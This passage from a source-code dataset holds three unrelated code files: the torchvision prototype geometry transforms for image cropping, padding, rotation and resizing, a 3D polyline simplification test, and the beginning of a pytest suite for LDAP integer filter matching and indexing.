crop\n in_ratio = float(width) / float(height)\n if in_ratio < min(self.ratio):\n w = width\n h = int(round(w / min(self.ratio)))\n elif in_ratio > max(self.ratio):\n h = height\n w = int(round(h * max(self.ratio)))\n else: # whole image\n w = width\n h = height\n i = (height - h) // 2\n j = (width - w) // 2\n\n return dict(top=i, left=j, height=h, width=w)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.resized_crop(\n inpt, **params, size=self.size, interpolation=self.interpolation, antialias=self.antialias\n )\n\n\nImageOrVideoTypeJIT = Union[features.ImageTypeJIT, features.VideoTypeJIT]\n\n\nclass FiveCrop(Transform):\n \"\"\"\n Example:\n >>> class BatchMultiCrop(transforms.Transform):\n ... def forward(self, sample: Tuple[Tuple[Union[features.Image, features.Video], ...], features.Label]):\n ... images_or_videos, labels = sample\n ... batch_size = len(images_or_videos)\n ... image_or_video = images_or_videos[0]\n ... images_or_videos = image_or_video.wrap_like(image_or_video, torch.stack(images_or_videos))\n ... labels = features.Label.wrap_like(labels, labels.repeat(batch_size))\n ... return images_or_videos, labels\n ...\n >>> image = features.Image(torch.rand(3, 256, 256))\n >>> label = features.Label(0)\n >>> transform = transforms.Compose([transforms.FiveCrop(), BatchMultiCrop()])\n >>> images, labels = transform(image, label)\n >>> images.shape\n torch.Size([5, 3, 224, 224])\n >>> labels.shape\n torch.Size([5])\n \"\"\"\n\n _transformed_types = (features.Image, PIL.Image.Image, features.is_simple_tensor, features.Video)\n\n def __init__(self, size: Union[int, Sequence[int]]) -> None:\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n def _transform(\n self, inpt: ImageOrVideoTypeJIT, params: Dict[str, Any]\n ) -> Tuple[ImageOrVideoTypeJIT, ImageOrVideoTypeJIT, ImageOrVideoTypeJIT, ImageOrVideoTypeJIT, ImageOrVideoTypeJIT]:\n return F.five_crop(inpt, self.size)\n\n def _check_inputs(self, flat_inputs: List[Any]) -> None:\n if has_any(flat_inputs, features.BoundingBox, features.Mask):\n raise TypeError(f\"BoundingBox'es and Mask's are not supported by {type(self).__name__}()\")\n\n\nclass TenCrop(Transform):\n \"\"\"\n See :class:`~torchvision.prototype.transforms.FiveCrop` for an example.\n \"\"\"\n\n _transformed_types = (features.Image, PIL.Image.Image, features.is_simple_tensor, features.Video)\n\n def __init__(self, size: Union[int, Sequence[int]], vertical_flip: bool = False) -> None:\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n self.vertical_flip = vertical_flip\n\n def _check_inputs(self, flat_inputs: List[Any]) -> None:\n if has_any(flat_inputs, features.BoundingBox, features.Mask):\n raise TypeError(f\"BoundingBox'es and Mask's are not supported by {type(self).__name__}()\")\n\n def _transform(\n self, inpt: Union[features.ImageType, features.VideoType], params: Dict[str, Any]\n ) -> Union[List[features.ImageTypeJIT], List[features.VideoTypeJIT]]:\n return F.ten_crop(inpt, self.size, vertical_flip=self.vertical_flip)\n\n\nclass Pad(Transform):\n def __init__(\n self,\n padding: Union[int, Sequence[int]],\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n padding_mode: Literal[\"constant\", \"edge\", \"reflect\", \"symmetric\"] = \"constant\",\n ) -> None:\n super().__init__()\n\n _check_padding_arg(padding)\n _check_padding_mode_arg(padding_mode)\n\n # This cast does Sequence[int] -> List[int] and is required to make mypy happy\n if not isinstance(padding, int):\n padding = list(padding)\n self.padding = padding\n self.fill = _setup_fill_arg(fill)\n self.padding_mode = padding_mode\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.pad(inpt, padding=self.padding, fill=fill, padding_mode=self.padding_mode)\n\n\nclass RandomZoomOut(_RandomApplyTransform):\n def __init__(\n self,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n side_range: Sequence[float] = (1.0, 4.0),\n p: float = 0.5,\n ) -> None:\n super().__init__(p=p)\n\n self.fill = _setup_fill_arg(fill)\n\n _check_sequence_input(side_range, \"side_range\", req_sizes=(2,))\n\n self.side_range = side_range\n if side_range[0] < 1.0 or side_range[0] > side_range[1]:\n raise ValueError(f\"Invalid canvas side range provided {side_range}.\")\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n orig_h, orig_w = query_spatial_size(flat_inputs)\n\n r = self.side_range[0] + torch.rand(1) * (self.side_range[1] - self.side_range[0])\n canvas_width = int(orig_w * r)\n canvas_height = int(orig_h * r)\n\n r = torch.rand(2)\n left = int((canvas_width - orig_w) * r[0])\n top = int((canvas_height - orig_h) * r[1])\n right = canvas_width - (left + orig_w)\n bottom = canvas_height - (top + orig_h)\n padding = [left, top, right, bottom]\n\n return dict(padding=padding)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.pad(inpt, **params, fill=fill)\n\n\nclass RandomRotation(Transform):\n def __init__(\n self,\n degrees: Union[numbers.Number, Sequence],\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n expand: bool = False,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n center: Optional[List[float]] = None,\n ) -> None:\n super().__init__()\n self.degrees = _setup_angle(degrees, name=\"degrees\", req_sizes=(2,))\n self.interpolation = interpolation\n self.expand = expand\n\n self.fill = _setup_fill_arg(fill)\n\n if center is not None:\n _check_sequence_input(center, \"center\", req_sizes=(2,))\n\n self.center = center\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n angle = torch.empty(1).uniform_(self.degrees[0], self.degrees[1]).item()\n return dict(angle=angle)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.rotate(\n inpt,\n **params,\n interpolation=self.interpolation,\n expand=self.expand,\n center=self.center,\n fill=fill,\n )\n\n\nclass RandomAffine(Transform):\n def __init__(\n self,\n degrees: Union[numbers.Number, Sequence],\n translate: Optional[Sequence[float]] = None,\n scale: Optional[Sequence[float]] = None,\n shear: Optional[Union[int, float, Sequence[float]]] = None,\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n center: Optional[List[float]] = None,\n ) -> None:\n super().__init__()\n self.degrees = _setup_angle(degrees, name=\"degrees\", req_sizes=(2,))\n if translate is not None:\n _check_sequence_input(translate, \"translate\", req_sizes=(2,))\n for t in translate:\n if not (0.0 <= t <= 1.0):\n raise ValueError(\"translation values should be between 0 and 1\")\n self.translate = translate\n if scale is not None:\n _check_sequence_input(scale, \"scale\", req_sizes=(2,))\n for s in scale:\n if s <= 0:\n raise ValueError(\"scale values should be positive\")\n self.scale = scale\n\n if shear is not None:\n self.shear = _setup_angle(shear, name=\"shear\", req_sizes=(2, 4))\n else:\n self.shear = shear\n\n self.interpolation = interpolation\n self.fill = _setup_fill_arg(fill)\n\n if center is not None:\n _check_sequence_input(center, \"center\", req_sizes=(2,))\n\n self.center = center\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n height, width = query_spatial_size(flat_inputs)\n\n angle = torch.empty(1).uniform_(self.degrees[0], self.degrees[1]).item()\n if self.translate is not None:\n max_dx = float(self.translate[0] * width)\n max_dy = float(self.translate[1] * height)\n tx = int(round(torch.empty(1).uniform_(-max_dx, max_dx).item()))\n ty = int(round(torch.empty(1).uniform_(-max_dy, max_dy).item()))\n translate = (tx, ty)\n else:\n translate = (0, 0)\n\n if self.scale is not None:\n scale = torch.empty(1).uniform_(self.scale[0], self.scale[1]).item()\n else:\n scale = 1.0\n\n shear_x = shear_y = 0.0\n if self.shear is not None:\n shear_x = torch.empty(1).uniform_(self.shear[0], self.shear[1]).item()\n if len(self.shear) == 4:\n shear_y = torch.empty(1).uniform_(self.shear[2], self.shear[3]).item()\n\n shear = (shear_x, shear_y)\n return dict(angle=angle, translate=translate, scale=scale, shear=shear)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.affine(\n inpt,\n **params,\n interpolation=self.interpolation,\n fill=fill,\n center=self.center,\n )\n\n\nclass RandomCrop(Transform):\n def __init__(\n self,\n size: Union[int, Sequence[int]],\n padding: Optional[Union[int, Sequence[int]]] = None,\n pad_if_needed: bool = False,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n padding_mode: Literal[\"constant\", \"edge\", \"reflect\", \"symmetric\"] = \"constant\",\n ) -> None:\n super().__init__()\n\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n if pad_if_needed or padding is not None:\n if padding is not None:\n _check_padding_arg(padding)\n _check_padding_mode_arg(padding_mode)\n\n self.padding = F._geometry._parse_pad_padding(padding) if padding else None # type: ignore[arg-type]\n self.pad_if_needed = pad_if_needed\n self.fill = _setup_fill_arg(fill)\n self.padding_mode = padding_mode\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n padded_height, padded_width = query_spatial_size(flat_inputs)\n\n if self.padding is not None:\n pad_left, pad_right, pad_top, pad_bottom = self.padding\n padded_height += pad_top + pad_bottom\n padded_width += pad_left + pad_right\n else:\n pad_left = pad_right = pad_top = pad_bottom = 0\n\n cropped_height, cropped_width = self.size\n\n if self.pad_if_needed:\n if padded_height < cropped_height:\n diff = cropped_height - padded_height\n\n pad_top += diff\n pad_bottom += diff\n padded_height += 2 * diff\n\n if padded_width < cropped_width:\n diff = cropped_width - padded_width\n\n pad_left += diff\n pad_right += diff\n padded_width += 2 * diff\n\n if padded_height < cropped_height or padded_width < cropped_width:\n raise ValueError(\n f\"Required crop size {(cropped_height, cropped_width)} is larger than \"\n f\"{'padded ' if self.padding is not None else ''}input image size {(padded_height, padded_width)}.\"\n )\n\n # We need a different order here than we have in self.padding since this padding will be parsed again in `F.pad`\n padding = [pad_left, pad_top, pad_right, pad_bottom]\n needs_pad = any(padding)\n\n needs_vert_crop, top = (\n (True, int(torch.randint(0, padded_height - cropped_height + 1, size=())))\n if padded_height > cropped_height\n else (False, 0)\n )\n needs_horz_crop, left = (\n (True, int(torch.randint(0, padded_width - cropped_width + 1, size=())))\n if padded_width > cropped_width\n else (False, 0)\n )\n\n return dict(\n needs_crop=needs_vert_crop or needs_horz_crop,\n top=top,\n left=left,\n height=cropped_height,\n width=cropped_width,\n needs_pad=needs_pad,\n padding=padding,\n )\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n if params[\"needs_pad\"]:\n fill = self.fill[type(inpt)]\n inpt = F.pad(inpt, padding=params[\"padding\"], fill=fill, padding_mode=self.padding_mode)\n\n if params[\"needs_crop\"]:\n inpt = F.crop(inpt, top=params[\"top\"], left=params[\"left\"], height=params[\"height\"], width=params[\"width\"])\n\n return inpt\n\n\nclass RandomPerspective(_RandomApplyTransform):\n def __init__(\n self,\n distortion_scale: float = 0.5,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n p: float = 0.5,\n ) -> None:\n super().__init__(p=p)\n\n if not (0 <= distortion_scale <= 1):\n raise ValueError(\"Argument distortion_scale value should be between 0 and 1\")\n\n self.distortion_scale = distortion_scale\n self.interpolation = interpolation\n self.fill = _setup_fill_arg(fill)\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n height, width = query_spatial_size(flat_inputs)\n\n distortion_scale = self.distortion_scale\n\n half_height = height // 2\n half_width = width // 2\n bound_height = int(distortion_scale * half_height) + 1\n bound_width = int(distortion_scale * half_width) + 1\n topleft = [\n int(torch.randint(0, bound_width, size=(1,))),\n int(torch.randint(0, bound_height, size=(1,))),\n ]\n topright = [\n int(torch.randint(width - bound_width, width, size=(1,))),\n int(torch.randint(0, bound_height, size=(1,))),\n ]\n botright = [\n int(torch.randint(width - bound_width, width, size=(1,))),\n int(torch.randint(height - bound_height, height, size=(1,))),\n ]\n botleft = [\n int(torch.randint(0, bound_width, size=(1,))),\n int(torch.randint(height - bound_height, height, size=(1,))),\n ]\n startpoints = [[0, 0], [width - 1, 0], [width - 1, height - 1], [0, height - 1]]\n endpoints = [topleft, topright, botright, botleft]\n perspective_coeffs = _get_perspective_coeffs(startpoints, endpoints)\n return dict(coefficients=perspective_coeffs)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.perspective(\n inpt,\n None,\n None,\n fill=fill,\n interpolation=self.interpolation,\n **params,\n )\n\n\nclass ElasticTransform(Transform):\n def __init__(\n self,\n alpha: Union[float, Sequence[float]] = 50.0,\n sigma: Union[float, Sequence[float]] = 5.0,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n ) -> None:\n super().__init__()\n self.alpha = _setup_float_or_seq(alpha, \"alpha\", 2)\n self.sigma = _setup_float_or_seq(sigma, \"sigma\", 2)\n\n self.interpolation = interpolation\n self.fill = _setup_fill_arg(fill)\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n size = list(query_spatial_size(flat_inputs))\n\n dx = torch.rand([1, 1] + size) * 2 - 1\n if self.sigma[0] > 0.0:\n kx = int(8 * self.sigma[0] + 1)\n # if kernel size is even we have to make it odd\n if kx % 2 == 0:\n kx += 1\n dx = F.gaussian_blur(dx, [kx, kx], list(self.sigma))\n dx = dx * self.alpha[0] / size[0]\n\n dy = torch.rand([1, 1] + size) * 2 - 1\n if self.sigma[1] > 0.0:\n ky = int(8 * self.sigma[1] + 1)\n # if kernel size is even we have to make it odd\n if ky % 2 == 0:\n ky += 1\n dy = F.gaussian_blur(dy, [ky, ky], list(self.sigma))\n dy = dy * self.alpha[1] / size[1]\n displacement = torch.concat([dx, dy], 1).permute([0, 2, 3, 1]) # 1 x H x W x 2\n return dict(displacement=displacement)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.elastic(\n inpt,\n **params,\n fill=fill,\n interpolation=self.interpolation,\n )\n\n\nclass RandomIoUCrop(Transform):\n def __init__(\n self,\n min_scale: float = 0.3,\n max_scale: float = 1.0,\n min_aspect_ratio: float = 0.5,\n max_aspect_ratio: float = 2.0,\n sampler_options: Optional[List[float]] = None,\n trials: int = 40,\n ):\n super().__init__()\n # Configuration similar to https://github.com/weiliu89/caffe/blob/ssd/examples/ssd/ssd_coco.py#L89-L174\n self.min_scale = min_scale\n self.max_scale = max_scale\n self.min_aspect_ratio = min_aspect_ratio\n self.max_aspect_ratio = max_aspect_ratio\n if sampler_options is None:\n sampler_options = [0.0, 0.1, 0.3, 0.5, 0.7, 0.9, 1.0]\n self.options = sampler_options\n self.trials = trials\n\n def _check_inputs(self, flat_inputs: List[Any]) -> None:\n if not (\n has_all(flat_inputs, features.BoundingBox)\n and has_any(flat_inputs, PIL.Image.Image, features.Image, features.is_simple_tensor)\n and has_any(flat_inputs, features.Label, features.OneHotLabel)\n ):\n raise TypeError(\n f\"{type(self).__name__}() requires input sample to contain Images or PIL Images, \"\n \"BoundingBoxes and Labels or OneHotLabels. Sample can also contain Masks.\"\n )\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n orig_h, orig_w = query_spatial_size(flat_inputs)\n bboxes = query_bounding_box(flat_inputs)\n\n while True:\n # sample an option\n idx = int(torch.randint(low=0, high=len(self.options), size=(1,)))\n min_jaccard_overlap = self.options[idx]\n if min_jaccard_overlap >= 1.0: # a value larger than 1 encodes the leave as-is option\n return dict()\n\n for _ in range(self.trials):\n # check the aspect ratio limitations\n r = self.min_scale + (self.max_scale - self.min_scale) * torch.rand(2)\n new_w = int(orig_w * r[0])\n new_h = int(orig_h * r[1])\n aspect_ratio = new_w / new_h\n if not (self.min_aspect_ratio <= aspect_ratio <= self.max_aspect_ratio):\n continue\n\n # check for 0 area crops\n r = torch.rand(2)\n left = int((orig_w - new_w) * r[0])\n top = int((orig_h - new_h) * r[1])\n right = left + new_w\n bottom = top + new_h\n if left == right or top == bottom:\n continue\n\n # check for any valid boxes with centers within the crop area\n xyxy_bboxes = F.convert_format_bounding_box(\n bboxes.as_subclass(torch.Tensor), bboxes.format, features.BoundingBoxFormat.XYXY\n )\n cx = 0.5 * (xyxy_bboxes[..., 0] + xyxy_bboxes[..., 2])\n cy = 0.5 * (xyxy_bboxes[..., 1] + xyxy_bboxes[..., 3])\n is_within_crop_area = (left < cx) & (cx < right) & (top < cy) & (cy < bottom)\n if not is_within_crop_area.any():\n continue\n\n # check at least 1 box with jaccard limitations\n xyxy_bboxes = xyxy_bboxes[is_within_crop_area]\n ious = box_iou(\n xyxy_bboxes,\n torch.tensor([[left, top, right, bottom]], dtype=xyxy_bboxes.dtype, device=xyxy_bboxes.device),\n )\n if ious.max() < min_jaccard_overlap:\n continue\n\n return dict(top=top, left=left, height=new_h, width=new_w, is_within_crop_area=is_within_crop_area)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n if len(params) < 1:\n return inpt\n\n is_within_crop_area = params[\"is_within_crop_area\"]\n\n if isinstance(inpt, (features.Label, features.OneHotLabel)):\n return inpt.wrap_like(inpt, inpt[is_within_crop_area]) # type: ignore[arg-type]\n\n output = F.crop(inpt, top=params[\"top\"], left=params[\"left\"], height=params[\"height\"], width=params[\"width\"])\n\n if isinstance(output, features.BoundingBox):\n bboxes = output[is_within_crop_area]\n bboxes = F.clamp_bounding_box(bboxes, output.format, output.spatial_size)\n output = features.BoundingBox.wrap_like(output, bboxes)\n elif isinstance(output, features.Mask):\n # apply is_within_crop_area if mask is one-hot encoded\n masks = output[is_within_crop_area]\n output = features.Mask.wrap_like(output, masks)\n\n return output\n\n\nclass ScaleJitter(Transform):\n def __init__(\n self,\n target_size: Tuple[int, int],\n scale_range: Tuple[float, float] = (0.1, 2.0),\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n antialias: Optional[bool] = None,\n ):\n super().__init__()\n self.target_size = target_size\n self.scale_range = scale_range\n self.interpolation = interpolation\n self.antialias = antialias\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n orig_height, orig_width = query_spatial_size(flat_inputs)\n\n scale = self.scale_range[0] + torch.rand(1) * (self.scale_range[1] - self.scale_range[0])\n r = min(self.target_size[1] / orig_height, self.target_size[0] / orig_width) * scale\n new_width = int(orig_width * r)\n new_height = int(orig_height * r)\n\n return dict(size=(new_height, new_width))\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.resize(inpt, size=params[\"size\"], interpolation=self.interpolation, antialias=self.antialias)\n\n\nclass RandomShortestSize(Transform):\n def __init__(\n self,\n min_size: Union[List[int], Tuple[int], int],\n max_size: Optional[int] = None,\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n antialias: Optional[bool] = None,\n ):\n super().__init__()\n self.min_size = [min_size] if isinstance(min_size, int) else list(min_size)\n self.max_size = max_size\n self.interpolation = interpolation\n self.antialias = antialias\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n orig_height, orig_width = query_spatial_size(flat_inputs)\n\n min_size = self.min_size[int(torch.randint(len(self.min_size), ()))]\n r = min_size / min(orig_height, orig_width)\n if self.max_size is not None:\n r = min(r, self.max_size / max(orig_height, orig_width))\n\n new_width = int(orig_width * r)\n new_height = int(orig_height * r)\n\n return dict(size=(new_height, new_width))\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.resize(inpt, size=params[\"size\"], interpolation=self.interpolation, antialias=self.antialias)\n\n\nclass FixedSizeCrop(Transform):\n def __init__(\n self,\n size: Union[int, Sequence[int]],\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n padding_mode: str = \"constant\",\n ) -> None:\n super().__init__()\n size = tuple(_setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\"))\n self.crop_height = size[0]\n self.crop_width = size[1]\n\n self.fill = _setup_fill_arg(fill)\n\n self.padding_mode = padding_mode\n\n def _check_inputs(self, flat_inputs: List[Any]) -> None:\n if not has_any(flat_inputs, PIL.Image.Image, features.Image, features.is_simple_tensor, features.Video):\n raise TypeError(\n f\"{type(self).__name__}() requires input sample to contain an tensor or PIL image or a Video.\"\n )\n\n if has_any(flat_inputs, features.BoundingBox) and not has_any(\n flat_inputs, features.Label, features.OneHotLabel\n ):\n raise TypeError(\n f\"If a BoundingBox is contained in the input sample, \"\n f\"{type(self).__name__}() also requires it to contain a Label or OneHotLabel.\"\n )\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n height, width = query_spatial_size(flat_inputs)\n new_height = min(height, self.crop_height)\n new_width = min(width, self.crop_width)\n\n needs_crop = new_height != height or new_width != width\n\n offset_height = max(height - self.crop_height, 0)\n offset_width = max(width - self.crop_width, 0)\n\n r = torch.rand(1)\n top = int(offset_height * r)\n left = int(offset_width * r)\n\n bounding_boxes: Optional[torch.Tensor]\n try:\n bounding_boxes = query_bounding_box(flat_inputs)\n except ValueError:\n bounding_boxes = None\n\n if needs_crop and bounding_boxes is not None:\n format = bounding_boxes.format\n bounding_boxes, spatial_size = F.crop_bounding_box(\n bounding_boxes.as_subclass(torch.Tensor),\n format=format,\n top=top,\n left=left,\n height=new_height,\n width=new_width,\n )\n bounding_boxes = F.clamp_bounding_box(bounding_boxes, format=format, spatial_size=spatial_size)\n height_and_width = F.convert_format_bounding_box(\n bounding_boxes, old_format=format, new_format=features.BoundingBoxFormat.XYWH\n )[..., 2:]\n is_valid = torch.all(height_and_width > 0, dim=-1)\n else:\n is_valid = None\n\n pad_bottom = max(self.crop_height - new_height, 0)\n pad_right = max(self.crop_width - new_width, 0)\n\n needs_pad = pad_bottom != 0 or pad_right != 0\n\n return dict(\n needs_crop=needs_crop,\n top=top,\n left=left,\n height=new_height,\n width=new_width,\n is_valid=is_valid,\n padding=[0, 0, pad_right, pad_bottom],\n needs_pad=needs_pad,\n )\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n if params[\"needs_crop\"]:\n inpt = F.crop(\n inpt,\n top=params[\"top\"],\n left=params[\"left\"],\n height=params[\"height\"],\n width=params[\"width\"],\n )\n\n if params[\"is_valid\"] is not None:\n if isinstance(inpt, (features.Label, features.OneHotLabel, features.Mask)):\n inpt = inpt.wrap_like(inpt, inpt[params[\"is_valid\"]]) # type: ignore[arg-type]\n elif isinstance(inpt, features.BoundingBox):\n inpt = features.BoundingBox.wrap_like(\n inpt,\n F.clamp_bounding_box(inpt[params[\"is_valid\"]], format=inpt.format, spatial_size=inpt.spatial_size),\n )\n\n if params[\"needs_pad\"]:\n fill = self.fill[type(inpt)]\n inpt = F.pad(inpt, params[\"padding\"], fill=fill, padding_mode=self.padding_mode)\n\n return inpt\n\n\nclass RandomResize(Transform):\n def __init__(\n self,\n min_size: int,\n max_size: int,\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n antialias: Optional[bool] = None,\n ) -> None:\n super().__init__()\n self.min_size = min_size\n self.max_size = max_size\n self.interpolation = interpolation\n self.antialias = antialias\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n size = int(torch.randint(self.min_size, self.max_size, ()))\n return dict(size=[size])\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.resize(inpt, params[\"size\"], interpolation=self.interpolation, antialias=self.antialias)\n","repo_name":"gavrilenkoof/opencv_test","sub_path":"models/pytorch_vision_main/torchvision/prototype/transforms/_geometry.py","file_name":"_geometry.py","file_ext":"py","file_size_in_byte":33499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25825571545","text":"# -*- coding: utf-8 -*-\n''' Test getIVectorAtLength, getJVectorAtLength and getKVectorAtLength \n methods.'''\n\nfrom __future__ import print_function\n\n__author__= \"Luis C. Pérez Tato (LCPT)\"\n__copyright__= \"Copyright 2022, LCPT\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@gmail.com\"\n\nimport math\nimport geom\nimport json\nimport os\n\ndef computeMaxAngle(pline3d):\n ''' Return the maximum angle between contiguous vertices for the given\n 3D polyline.\n '''\n vertices= pline3d.getVertexList()\n p0= vertices[0]\n iVectors= list()\n for p1 in vertices[1:]:\n s= geom.Segment3d(p0, p1)\n iVectors.append(s.getIVector)\n p0= p1\n\n iV0= iVectors[0]\n maxAngle= 0.0\n for iV in iVectors[1:]:\n maxAngle= max(maxAngle, iV.getAngle(iV0))\n iV0= iV\n return maxAngle\n\npth= os.path.dirname(__file__)\nif(not pth):\n pth= \".\"\nverticesFilePath= pth+'/../../../aux/polyline3d_test_points.json'\n\ncoordinateData= open(verticesFilePath, 'r')\ncoordinateValues= json.load(coordinateData)\ncoordinateData.close()\nvertices= list()\nfor coo in coordinateValues:\n vertices.append(geom.Pos3d(coo[0], coo[1], coo[2]))\n\n\n\n# Define polyline.\npline3d= geom.Polyline3d(vertices)\nlengthBefore= pline3d.getLength()\nnvBefore= pline3d.getNumVertices()\n## Remove repeated vertices.\ntol= lengthBefore/1e4\npline3d.removeRepeatedVertexes(tol)\nlength= pline3d.getLength()\nnv= pline3d.getNumVertices()\n\nlengthDiff= abs(lengthBefore-length)\nnvDiff= nvBefore-nv\n\nokRepeatedVertexes= (nvDiff==1) and (abs(lengthDiff)<1e-12)\n\n# Remove little imperfections.\nmaxAngleBefore= computeMaxAngle(pline3d) # Compute max. angle between contiguous segments.\npline3d.simplify(0.15) # Simplify the polyline\nmaxAngle= computeMaxAngle(pline3d)\n\nokImperfections= (maxAngle=FFFFFFFFFFFFFFFF))\",\n \"(&(sn>=0000000000000000)(sn<=1111111111111111))\",\n \"(&(sn>=0000000000000000)(givenname<=FFFFFFFFFFFFFFFF))\"]\n\nINDEXES = [\"(uidNumber=18446744073709551617)\",\n \"(gidNumber=18446744073709551617)\",\n \"(MYINTATTR=18446744073709551617)\",\n \"(&(uidNumber=*)(!(uidNumber=18446744073709551617)))\",\n \"(&(gidNumber=*)(!(gidNumber=18446744073709551617)))\",\n \"(&(uidNumber=*)(!(gidNumber=18446744073709551617)))\",\n \"(&(myintattr=*)(!(myintattr=18446744073709551617)))\",\n \"(uidNumber>=-18446744073709551617)\",\n \"(gidNumber>=-18446744073709551617)\",\n \"(uidNumber<=18446744073709551617)\",\n \"(gidNumber<=18446744073709551617)\",\n \"(myintattr<=18446744073709551617)\"]\n\n\nINDEXES_FALSE = [\"(gidNumber=54321)\",\n \"(uidNumber=54321)\",\n \"(myintattr=54321)\",\n \"(gidNumber<=-999999999999999999999999999999)\",\n \"(uidNumber<=-999999999999999999999999999999)\",\n \"(myintattr<=-999999999999999999999999999999)\",\n \"(gidNumber>=999999999999999999999999999999)\",\n \"(uidNumber>=999999999999999999999999999999)\",\n \"(myintattr>=999999999999999999999999999999)\"]\n\n\n@pytest.fixture(scope=\"module\")\ndef _create_entries(topo):\n \"\"\"\n Will create necessary users for this script.\n \"\"\"\n # Creating Users\n users_people = UserAccounts(topo.standalone, DEFAULT_SUFFIX)\n\n for count in range(3):\n users_people.create(properties={\n 'ou': ['Accounting', 'People'],\n 'cn': f'User {count}F',\n 'sn': f'{count}' * 16,\n 'givenname': 'FFFFFFFFFFFFFFFF',\n 'uid': f'user{count}F',\n 'mail': f'user{count}F@test.com',\n 'manager': f'uid=user{count}F,ou=People,{DEFAULT_SUFFIX}',\n 'userpassword': PW_DM,\n 'homeDirectory': '/home/' + f'user{count}F',\n 'uidNumber': '1000',\n 'gidNumber': '2000',\n })\n\n cos = CosTemplates(topo.standalone, DEFAULT_SUFFIX, rdn='ou=People')\n for user, number, des in [('a', '18446744073709551617', '2^64+1'),\n ('b', '18446744073709551618', '2^64+1'),\n ('c', '-18446744073709551617', '-2^64+1'),\n ('d', '-18446744073709551618', '-2^64+1'),\n ('e', '0', '0'),\n ('f', '2', '2'),\n ('g', '-2', '-2')]:\n cos.create(properties={\n 'cn': user,\n 'uidnumber': number,\n 'gidnumber': number,\n 'myintattr': number,\n 'description': f'uidnumber value {des} - gidnumber is same but not indexed'\n })\n\n\n@pytest.mark.parametrize(\"real_value\", FILTERS)\ndef test_positive(topo, _create_entries, real_value):\n \"\"\"Test positive filters\n\n :id: 57243326-91ae-11e9-aca3-8c16451d917b\n :parametrized: yes\n :setup: Standalone\n :steps:\n 1. Try to pass filter rules as per the condition .\n :expectedresults:\n 1. Pass\n \"\"\"\n assert Accounts(topo.standalone, DEFAULT_SUFFIX).filter(real_value)\n\n\ndef test_indexing_schema(topo, _create_entries):\n \"\"\"Test with schema\n\n :id: 67a2179a-91ae-11e9-9a33-8c16451d917b\n :setup: Standalone\n :steps:\n 1. Add attribute types to Schema.\n 2. Try to pass filter rules as per the condition .\n :expectedresults:\n 1. Pass\n 2. Pass\n \"\"\"\n cos = CosTemplates(topo.standalone, DEFAULT_SUFFIX, rdn='ou=People')\n Schema(topo.standalone).add('attributetypes',\n \"( 8.9.10.11.12.13.14.15 NAME 'myintattr' DESC 'for integer \"\n \"syntax index ordering testing' EQUALITY integerMatch ORDERING \"\n \"integerOrderingMatch SYNTAX 1.3.6.1.4.1.1466.115.121.1.27 )\")\n topo.standalone.restart()\n assert cos.filter(\"(myintattr>=-18446744073709551617)\")\n\n\n@pytest.mark.parametrize(\"real_value\", INDEXES)\ndef test_indexing(topo, _create_entries, real_value):\n \"\"\"Test positive index filters\n\n :id: 7337589a-91ae-11e9-ad44-8c16451d917b\n :parametrized: yes\n :setup: Standalone\n :steps:\n 1. Try to pass filter rules as per the condition .\n :expectedresults:\n 1. Pass\n \"\"\"\n cos = CosTemplates(topo.standalone, DEFAULT_SUFFIX, 